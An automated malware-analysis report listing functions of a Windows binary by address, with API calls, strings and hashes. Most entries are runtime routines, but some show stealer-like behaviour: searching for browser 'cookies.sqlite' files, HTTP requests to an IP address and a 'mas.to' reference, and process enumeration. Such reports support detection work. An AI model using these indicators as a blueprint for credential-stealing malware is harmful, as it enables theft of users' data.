String ID: PATH$PATH=$X5v$x5v
API String ID: 1998870925-4261008626
Opcode ID: d35cba2446aa7ba1b1610eb632b76abecddbdf78f6445578c46bf1269f1dbd3e
Instruction ID: e1b07dd2503988ba11d34cde13d4e581b07e2b5102eea1ed6c31ce5b0d4299ed
Opcode Fuzzy Hash: d35cba2446aa7ba1b1610eb632b76abecddbdf78f6445578c46bf1269f1dbd3e
Instruction Fuzzy Hash: 39315E71A12210AFD724DFA8EC4DB9A3BF8AB99711F15413BE50593260D77898C0CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0049C0DC, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(004D4A28,P-@,?,?,?,0049C1E0,?,004CEA38,0000000C,0049C20C,?,?,0049C9D5,004B7CF1,?), ref: 0049C0F1
DecodePointer.KERNEL32(?,?,0049C1E0,?,004CEA38,0000000C,0049C20C,?,?,0049C9D5,004B7CF1,?), ref: 0049C0FE
__realloc_crt.LIBCMT ref: 0049C13B
__realloc_crt.LIBCMT ref: 0049C151
EncodePointer.KERNEL32(00000000,?,?,0049C1E0,?,004CEA38,0000000C,0049C20C,?,?,0049C9D5,004B7CF1,?), ref: 0049C163
EncodePointer.KERNEL32(?,?,?,0049C1E0,?,004CEA38,0000000C,0049C20C,?,?,0049C9D5,004B7CF1,?), ref: 0049C177
EncodePointer.KERNEL32(-00000004,?,?,0049C1E0,?,004CEA38,0000000C,0049C20C,?,?,0049C9D5,004B7CF1,?), ref: 0049C17F

Strings

P-@, xrefs: 0049C0E3

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Pointer$Encode$Decode__realloc_crt
String ID: P-@
API String ID: 4108716018-3305893085
Opcode ID: 25e0e4e601459e24bcbd8275923078b7c521353a8ec7af66a76a19f52b6b5bdf
Instruction ID: 7012e1594ca56cf5a7f4639412be7d728f5325b0ba160baa60806d2465e23922
Opcode Fuzzy Hash: 25e0e4e601459e24bcbd8275923078b7c521353a8ec7af66a76a19f52b6b5bdf
Instruction Fuzzy Hash: 8F11D372600215AFDF005F78EDC285A7BEDEB45364311097BE801E3261EB75EC818E9C

Uniqueness

Uniqueness Score: -1.00%

Function 004185F0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0041861C
std::_Lockit::_Lockit.LIBCPMT ref: 00418642
std::bad_exception::bad_exception.LIBCMT ref: 004186CA
__CxxThrowException@8.LIBCMT ref: 004186D9
std::_Lockit::_Lockit.LIBCPMT ref: 004186EE
std::locale::facet::_Facet_Register.LIBCPMT ref: 00418709

Strings

bad cast, xrefs: 004186C1

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: 52582ac12b1018fab5956bb68680d91455fa7c00245413156fd600cf34055142
Instruction ID: 61d71b5fe86ca11294d5420486f5379aa49884d9afa9d9a02dc993d09b18ea87
Opcode Fuzzy Hash: 52582ac12b1018fab5956bb68680d91455fa7c00245413156fd600cf34055142
Instruction Fuzzy Hash: 4931E0755043408FCB14EF10E991B9A77E0FB94764F140A6FF496A72E1DB38E884CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00496100, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 00417A90: std::locale::_Init.LIBCPMT ref: 00417AD6
Part of subcall function 00417A90: std::_Lockit::_Lockit.LIBCPMT ref: 00417AE9

Part of subcall function 00418B00: std::_Lockit::_Lockit.LIBCPMT ref: 00418B59

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0049629C

Part of subcall function 00417940: __CxxThrowException@8.LIBCMT ref: 00417963
Part of subcall function 00417940: std::exception::exception.LIBCMT ref: 0041798C
Part of subcall function 00417940: __CxxThrowException@8.LIBCMT ref: 004179AB
Part of subcall function 00417940: std::exception::exception.LIBCMT ref: 004179CD
Part of subcall function 00417940: __CxxThrowException@8.LIBCMT ref: 004179EC
Part of subcall function 00417940: std::exception::exception.LIBCMT ref: 00417A09
Part of subcall function 00417940: __CxxThrowException@8.LIBCMT ref: 00417A28

Strings

0pL, xrefs: 004961D7
`J@, xrefs: 0049620B
A@, xrefs: 004961ED
@A@, xrefs: 004961DE
@B@, xrefs: 00496218

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throw$std::exception::exception$LockitLockit::_std::_$InitIos_base_dtorstd::ios_base::_std::locale::_
String ID: 0pL$@A@$@B@$`J@$A@
API String ID: 250614744-438863827
Opcode ID: 97e982bee7af23ef6303ac1ab39a5d5ab0d7019686e83b7fe38ec1941dbf8ba8
Instruction ID: 65ae86c68d49ab7a11304c8b24cbdb17181524f5cbbb5bd10e2968bbc8fed94e
Opcode Fuzzy Hash: 97e982bee7af23ef6303ac1ab39a5d5ab0d7019686e83b7fe38ec1941dbf8ba8
Instruction Fuzzy Hash: B64137B0508380CFD724DF24C580B9BFBE4FB98308F508D2EE59997251DBB89548CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00404570, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00404587

Part of subcall function 0049B1D5: std::exception::exception.LIBCMT ref: 0049B1EA
Part of subcall function 0049B1D5: __CxxThrowException@8.LIBCMT ref: 0049B1FF
Part of subcall function 0049B1D5: std::exception::exception.LIBCMT ref: 0049B210

std::_Xinvalid_argument.LIBCPMT ref: 004045AA
std::_Xinvalid_argument.LIBCPMT ref: 004045C5
_memmove.LIBCMT ref: 00404626

Strings

invalid string position, xrefs: 00404582
string too long, xrefs: 004045A5, 004045C0

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: 4fce9cbf918ded2c38a8ba38af68609befbd2e6389a820d44ef92163d0745d36
Instruction ID: 250e57ee2fc2892ce8122578cd2753f4dee41fd89a5c0ce31f9679457375e17d
Opcode Fuzzy Hash: 4fce9cbf918ded2c38a8ba38af68609befbd2e6389a820d44ef92163d0745d36
Instruction Fuzzy Hash: 2F2193723042009BC724DE1DE990A2AB7E1EBE6714B600E3FF252D72D1D779DC4187A9

Uniqueness

Uniqueness Score: -1.00%

Function 004180A0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004180CE
std::exception::exception.LIBCMT ref: 0041810D

Part of subcall function 0049C32E: std::exception::_Copy_str.LIBCMT ref: 0049C349

__CxxThrowException@8.LIBCMT ref: 00418124

Part of subcall function 0049C9F1: RaiseException.KERNEL32(S0@,?,2D794ED1,004BB6BC,00403053,?,004CB4C0,?,2D794ED1), ref: 0049CA33

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0041812B

Strings

bad locale name, xrefs: 00418105
yA, xrefs: 0041811C

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
String ID: yA$bad locale name
API String ID: 73090415-1344023470
Opcode ID: 8c137d7277b8d131593d02a7f6fec72f1394c890439066219a858aad24473143
Instruction ID: b99b666c4dad2dc89f48d61ff09c0cb729f592b38e8194f2ab0e255fa7e4e700
Opcode Fuzzy Hash: 8c137d7277b8d131593d02a7f6fec72f1394c890439066219a858aad24473143
Instruction Fuzzy Hash: C01182B24087409FC310DF199981A47FBE4FB68714F408A6FF49993741D738A508CBBA

Uniqueness

Uniqueness Score: -1.00%

Function 00493530, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

APIs

_localeconv.LIBCMT ref: 00493560

Part of subcall function 0049FEBB: __getptd.LIBCMT ref: 0049FEBB

Strings

., xrefs: 00493637
,, xrefs: 00493640
true, xrefs: 004935EC
false, xrefs: 004935C2

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __getptd_localeconv
String ID: ,$.$false$true
API String ID: 1421026308-4283260876
Opcode ID: 2f80f0005759ed82b41f413d7540dff7e419ae79121cbe831705ec9ede9afbe8
Instruction ID: 2a6d5d1f9e94b508d0bb6af87ac1e74d4ec1b8acd567f3678f3be9f5eba983e6
Opcode Fuzzy Hash: 2f80f0005759ed82b41f413d7540dff7e419ae79121cbe831705ec9ede9afbe8
Instruction Fuzzy Hash: C93128B59082809BCF12DF299481666BFA0DF4A354F1880BFDC558F346D739DA05CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00403460, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040347A

Part of subcall function 0049B1D5: std::exception::exception.LIBCMT ref: 0049B1EA
Part of subcall function 0049B1D5: __CxxThrowException@8.LIBCMT ref: 0049B1FF
Part of subcall function 0049B1D5: std::exception::exception.LIBCMT ref: 0049B210

std::_Xinvalid_argument.LIBCPMT ref: 004034B9

Part of subcall function 0049B188: std::exception::exception.LIBCMT ref: 0049B19D
Part of subcall function 0049B188: __CxxThrowException@8.LIBCMT ref: 0049B1B2
Part of subcall function 0049B188: std::exception::exception.LIBCMT ref: 0049B1C3

_memmove.LIBCMT ref: 00403521

Strings

invalid string position, xrefs: 00403475
string too long, xrefs: 004034B4

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 1615890066-4289949731
Opcode ID: e51205bfa1386d6aabaf0f2540ef2f56b0af5a5c6a241df14ed94f465ac95c70
Instruction ID: 16e54054ee1cb2da4d2155e9293334c47a3c7f2cfa6ddc8472a688241ce8b449
Opcode Fuzzy Hash: e51205bfa1386d6aabaf0f2540ef2f56b0af5a5c6a241df14ed94f465ac95c70
Instruction Fuzzy Hash: 9431E2323043149BC621AE5CE98196BF7ADEFD6762710093FF542DB290DB36E90187A9

Uniqueness

Uniqueness Score: -1.00%

Function 00403370, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040338A

Part of subcall function 0049B1D5: std::exception::exception.LIBCMT ref: 0049B1EA
Part of subcall function 0049B1D5: __CxxThrowException@8.LIBCMT ref: 0049B1FF
Part of subcall function 0049B1D5: std::exception::exception.LIBCMT ref: 0049B210

std::_Xinvalid_argument.LIBCPMT ref: 004033C6

Part of subcall function 0049B188: std::exception::exception.LIBCMT ref: 0049B19D
Part of subcall function 0049B188: __CxxThrowException@8.LIBCMT ref: 0049B1B2
Part of subcall function 0049B188: std::exception::exception.LIBCMT ref: 0049B1C3

_memmove.LIBCMT ref: 00403427

Strings

invalid string position, xrefs: 00403385
string too long, xrefs: 004033C1

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 1615890066-4289949731
Opcode ID: 3d89cef3e8b5f7dab6363f680a558746129ceba8fc5feff28e84a3c14abf7b78
Instruction ID: fc52d5bcf03503e14a0d47f07702954af73c8eadaf93a15c0afd54800ed5a30f
Opcode Fuzzy Hash: 3d89cef3e8b5f7dab6363f680a558746129ceba8fc5feff28e84a3c14abf7b78
Instruction Fuzzy Hash: 0121F7323006109BC7219E5DA980A6EFB9CDBE2766F20093FF551DB2C1DB799D4083A9

Uniqueness

Uniqueness Score: -1.00%

Function 004171E6, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 00417256
FindNextFileA.KERNEL32(00000000,?), ref: 00417358
FindClose.KERNEL32(00000000), ref: 00417367

Strings

cookies.sqlite, xrefs: 0041725F
%s\%s, xrefs: 00417250

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$CloseFileNext_sprintf
String ID: %s\%s$cookies.sqlite
API String ID: 1046737199-1020834890
Opcode ID: 2eb414782a19d272b390491ef47deb18e78dbd948902ac9104ddf3cc706b2ab7
Instruction ID: 064d92779e4786fb1707a0bbc9186d9a03ebf30d1dd5110ac8f349b91cf63455
Opcode Fuzzy Hash: 2eb414782a19d272b390491ef47deb18e78dbd948902ac9104ddf3cc706b2ab7
Instruction Fuzzy Hash: 7721367210C2801AC7219F309CC1AF77B7E9BA6304F48499FF89686241EB3FD54DC26A

Uniqueness

Uniqueness Score: -1.00%

Function 00493050, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00493057

Part of subcall function 0049E04E: __FF_MSGBANNER.LIBCMT ref: 0049E067
Part of subcall function 0049E04E: __NMSG_WRITE.LIBCMT ref: 0049E06E
Part of subcall function 0049E04E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A0B2E,00000000,00000001,00000000,?,004A75C4,00000018,004CF090,0000000C,004A7654), ref: 0049E093

GetTickCount.KERNEL32 ref: 00493064

Part of subcall function 0049FE88: __getptd.LIBCMT ref: 0049FE8D

_rand.LIBCMT ref: 00493080

Part of subcall function 0049FE9A: __getptd.LIBCMT ref: 0049FE9A

_sprintf.LIBCMT ref: 00493095

Strings

%s%d, xrefs: 0049308F

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __getptd$AllocateCountHeapTick_malloc_rand_sprintf
String ID: %s%d
API String ID: 2210831635-1110647743
Opcode ID: 9ebabe74a073720600e8862edd3ea84d53632f7f2ce9d6442dfb6cdb9d76b5c6
Instruction ID: 94034e78967ba481b7292eef43dac6ac7b7959af3d56be502e03ba38a1ad7de7
Opcode Fuzzy Hash: 9ebabe74a073720600e8862edd3ea84d53632f7f2ce9d6442dfb6cdb9d76b5c6
Instruction Fuzzy Hash: 51F0BB9370015157DB117AAA9C45F87AE8C8F61351F14447FF648C7213E969CD5083BB

Uniqueness

Uniqueness Score: -1.00%

Function 0049E1B5, Relevance: 7.7, APIs: 5, Instructions: 160COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0049E210
_memcpy_s.LIBCMT ref: 0049E281
__read.LIBCMT ref: 0049E2E4
__filbuf.LIBCMT ref: 0049E300

Part of subcall function 004A284D: __getptd_noexit.LIBCMT ref: 004A284D

_memset.LIBCMT ref: 0049E341

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
String ID:
API String ID: 4048096073-0
Opcode ID: 583b1b677e1792be25ddf204d47e98c5b0f8de77f7936e8b47d8b9f05f1225b4
Instruction ID: 1ac67f202c977f64f0fa06004735b99fc761685b36bf4d2ab039f42c530740d4
Opcode Fuzzy Hash: 583b1b677e1792be25ddf204d47e98c5b0f8de77f7936e8b47d8b9f05f1225b4
Instruction Fuzzy Hash: 4E51D030A00205EBDF24DFABC94469FBFB5AF51320F24827BE82497291D7789E41CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00418150, Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00418182

Part of subcall function 0049B6AA: _setlocale.LIBCMT ref: 0049B6BC

_free.LIBCMT ref: 00418194

Part of subcall function 0049E874: RtlFreeHeap.NTDLL(00000000,00000000,?,004030AB,?,2D794ED1), ref: 0049E88A

_free.LIBCMT ref: 004181A7
_free.LIBCMT ref: 004181BA
_free.LIBCMT ref: 004181CD

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$FreeHeapLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 1034197179-0
Opcode ID: b5b02bde389356c97008c127cfe2bc10859bcc976c1755d0fcbfc13f9b871136
Instruction ID: 9940f372f53cae88a363a79202e9387dc8d63462f9e991f136512c6998a2b412
Opcode Fuzzy Hash: b5b02bde389356c97008c127cfe2bc10859bcc976c1755d0fcbfc13f9b871136
Instruction Fuzzy Hash: 761182F1900B406BDA20DF1AD845A4BFBE9EF90710F144A2FF05AC3750E739E8048A96

Uniqueness

Uniqueness Score: -1.00%

Function 004A7136, Relevance: 7.5, APIs: 5, Instructions: 34COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004A7142

Part of subcall function 004A4EDD: __getptd_noexit.LIBCMT ref: 004A4EE0
Part of subcall function 004A4EDD: __amsg_exit.LIBCMT ref: 004A4EED

__getptd.LIBCMT ref: 004A7159
__amsg_exit.LIBCMT ref: 004A7167
__lock.LIBCMT ref: 004A7177
__updatetlocinfoEx_nolock.LIBCMT ref: 004A718B

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 4d4828333fb6b383eab88b09f1e7db4750f43e6ab659692cd90c228e13da406b
Instruction ID: 72ba6c850253534e5d4345560bca46b6812f78be0ef27554b4da5c5398e7648a
Opcode Fuzzy Hash: 4d4828333fb6b383eab88b09f1e7db4750f43e6ab659692cd90c228e13da406b
Instruction Fuzzy Hash: 8AF062319486109AD631BB699C02B4F33D06F2272DF10425FE054963C2CB6C59419A5E

Uniqueness

Uniqueness Score: -1.00%

Function 0042F040, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042F107
_memset.LIBCMT ref: 0042F258

Strings

0, xrefs: 0042F1A2
|EM, xrefs: 0042F0BF, 0042F0E0, 0042F1E6, 0042F207

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset
String ID: 0$|EM
API String ID: 2102423945-2430296235
Opcode ID: 4779ea2c7a74a9354124b13f0a480c8e567964b7ee21737ba3978441bbfeabfe
Instruction ID: 2e47e9e8c0fd1c54b829745a75baa20473620332735116e542dd244afe2fc290
Opcode Fuzzy Hash: 4779ea2c7a74a9354124b13f0a480c8e567964b7ee21737ba3978441bbfeabfe
Instruction Fuzzy Hash: 4161BC70B00216DBD704DF28E884A2B77A5BF84744FD4893EE8458B356E738DD19CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00410580, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 123COMMON

Download Yara Rule

APIs

Part of subcall function 00410340: DeleteUrlCacheEntry.WININET(?), ref: 004103B8
Part of subcall function 00410340: DeleteUrlCacheEntry.WININET(00000000), ref: 004103DF
Part of subcall function 00410340: InternetOpenA.WININET(004BB6C4,00000000,00000000,00000000,00000000), ref: 00410401
Part of subcall function 00410340: InternetConnectA.WININET(00000000,?,000001BB,00000000,00000000,00000003,04800000,00000000), ref: 0041043C
Part of subcall function 00410340: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,04800000,00000000), ref: 00410474
Part of subcall function 00410340: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00410489

Part of subcall function 00404F50: _memmove.LIBCMT ref: 00404F8B

_strtok.LIBCMT ref: 004106CB

Strings

23.88.105.196, xrefs: 004106EB
scan, xrefs: 00410696
mas.to, xrefs: 00410619

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CacheDeleteEntryHttpInternetOpenRequest$ConnectSend_memmove_strtok
String ID: 23.88.105.196$mas.to$scan
API String ID: 2343206444-3532122280
Opcode ID: 6c63c89981174e697b248ab89576717fc14377b6ecdf74983e24cafd0fcb1a3c
Instruction ID: c8a469cae4b9ee166ca8befd8a5675b65f664455efa879c5325bc3376d55e6dc
Opcode Fuzzy Hash: 6c63c89981174e697b248ab89576717fc14377b6ecdf74983e24cafd0fcb1a3c
Instruction Fuzzy Hash: 9241D2B15083809FD710EF25C881BABBBE8EB95718F404A2EF49547281E7799548CBA7

Uniqueness

Uniqueness Score: -1.00%

Function 00403110, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 004031B0

Part of subcall function 0049C32E: std::exception::_Copy_str.LIBCMT ref: 0049C349

__CxxThrowException@8.LIBCMT ref: 004031C5

Part of subcall function 0049C9F1: RaiseException.KERNEL32(S0@,?,2D794ED1,004BB6BC,00403053,?,004CB4C0,?,2D794ED1), ref: 0049CA33

Part of subcall function 00402F40: std::exception::exception.LIBCMT ref: 00402F76
Part of subcall function 00402F40: __CxxThrowException@8.LIBCMT ref: 00402F8D

_memmove.LIBCMT ref: 0040320E

Strings

P-@, xrefs: 004031BE

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_memmovestd::exception::_
String ID: P-@
API String ID: 163498487-3305893085
Opcode ID: 0712e2a448beeb3d7b8fd15b0559c476a72bb47aede50cf5e155954ceb133759
Instruction ID: 486326a0063b83de9025a31b2d93e7eb048a48092115a542314a79203f052a6c
Opcode Fuzzy Hash: 0712e2a448beeb3d7b8fd15b0559c476a72bb47aede50cf5e155954ceb133759
Instruction Fuzzy Hash: 9841B771A00105ABCB04DF69C9816AEBBF9FB49355F20423FE816A7780D778AE44C7E5

Uniqueness

Uniqueness Score: -1.00%

Function 00491030, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,?,?,004123DF,?,007EC828,00000000,?,007EC778,00000000), ref: 00491042
IsWow64Process.KERNEL32(00000000,?,?,004123DF,?,007EC828,00000000,?,007EC778,00000000), ref: 00491049

Strings

x64, xrefs: 0049105B
x86, xrefs: 00491064

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process$CurrentWow64
String ID: x64$x86
API String ID: 1905925150-1778291495
Opcode ID: b3bdd6316ac2445cbe0fd218eea76ef28b5b210bae562b58a04c998909d29fe5
Instruction ID: 6d39bd485af480b2140526ce6b5fe6e71a0dd36a15449e4175001148558a5463
Opcode Fuzzy Hash: b3bdd6316ac2445cbe0fd218eea76ef28b5b210bae562b58a04c998909d29fe5
Instruction Fuzzy Hash: B8F05EB1605302AFD7208F68D885B17BBECAB44791F14893FB186966A0C67889448BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00471660, Relevance: 6.3, APIs: 4, Instructions: 256COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0047170F
_memset.LIBCMT ref: 00471835
_memmove.LIBCMT ref: 004718C5
_memset.LIBCMT ref: 004718DE

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset$_memmove
String ID:
API String ID: 2532777613-0
Opcode ID: 531717382ed3cba1500e0dcefa8a14365d418f3ba69c5abd8dd6285786d68148
Instruction ID: 37f9088ae92f1cb7cc06353bf87dc656e7ad7306ee0eed28a333081d38dad37d
Opcode Fuzzy Hash: 531717382ed3cba1500e0dcefa8a14365d418f3ba69c5abd8dd6285786d68148
Instruction Fuzzy Hash: EDA18170A04B069FD718DF29C880BA6B7E1FF84714F14852ED8598B7A1E738F855CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0049F2BD, Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0049F358
__flush.LIBCMT ref: 0049F376
__write.LIBCMT ref: 0049F39D
__flsbuf.LIBCMT ref: 0049F3C8

Part of subcall function 004A284D: __getptd_noexit.LIBCMT ref: 004A284D

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: f8ae0c977b8d12d05024fcf30666bf7421554518a4371bc13d0bd4a5f573f521
Instruction ID: 4c8b7da3941b3fbc133e5dc0a3ea6702fd7cd52a7b71e60dbc717fcc10f89492
Opcode Fuzzy Hash: f8ae0c977b8d12d05024fcf30666bf7421554518a4371bc13d0bd4a5f573f521
Instruction Fuzzy Hash: E9419F31A006049BDF24DFAA88856AFBFB5AF80324F24817FEC55D6280D77DDD498B48

Uniqueness

Uniqueness Score: -1.00%

Function 004B121A, Relevance: 6.1, APIs: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004B124E
__isleadbyte_l.LIBCMT ref: 004B1281
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036ACC,00BFBBEF,00000000,?,?,?,004AF6A4,00000109,00BFBBEF,00000003), ref: 004B12B2
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,004AF6A4,00000109,00BFBBEF,00000003), ref: 004B1320

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 9c17a0650e31d761841d794ae28cb099ae0994050b4eb252ae31cce1953730a1
Instruction ID: 4db2654cd19cbf0ff6fdb0cc35245cd9993303e1929d1d4c5589467273d214f0
Opcode Fuzzy Hash: 9c17a0650e31d761841d794ae28cb099ae0994050b4eb252ae31cce1953730a1
Instruction Fuzzy Hash: CE31D531500285EFDF14DFA8C8A49EE3BA5BF01310F5485EAE555EB2A1D734DD40DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00493120, Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?,?,00000000,00000000,00000000), ref: 00493139
_malloc.LIBCMT ref: 00493151

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EncodersGdipImageSize_malloc
String ID:
API String ID: 562675128-0
Opcode ID: 4c4f9c49db9d171f6ea75eeb0535d6af9122cd6854c2a634400d949959db66f3
Instruction ID: 7d92bf085faf7782d27ed5250d8dd4ee52a53542456e92d3558db234766de45d
Opcode Fuzzy Hash: 4c4f9c49db9d171f6ea75eeb0535d6af9122cd6854c2a634400d949959db66f3
Instruction Fuzzy Hash: 512129726042105FCB10EF19EC8149BB7E5EF95334F54877BE8688B361E336DA46C691

Uniqueness

Uniqueness Score: -1.00%

Function 004B1107, Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(00000000,004A89DD,00000000,00000000,74785970,?,0049EA8B,?,00000000), ref: 004B110A
__malloc_crt.LIBCMT ref: 004B1139
FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,00000000,?,0049EA8B,?,00000000), ref: 004B1146

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 35d7fa1be702710d1e5db715c49e6c7e7c1a561b8be8fa75b6e2af1f04974dc2
Instruction ID: 316f26375f605f0cd77650341741c6df0c53f4fdb34655e037849bd45c2b6d01
Opcode Fuzzy Hash: 35d7fa1be702710d1e5db715c49e6c7e7c1a561b8be8fa75b6e2af1f04974dc2
Instruction Fuzzy Hash: 71F0A777601110ABCF31777DBC958DB6739DAEA36435A452BF901C3360FA288D8286F9

Uniqueness

Uniqueness Score: -1.00%

Function 00417110, Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

Part of subcall function 00417000: _malloc.LIBCMT ref: 0041702D
Part of subcall function 00417000: CreateToolhelp32Snapshot.KERNEL32 ref: 00417043
Part of subcall function 00417000: CloseHandle.KERNEL32(00000000), ref: 00417053

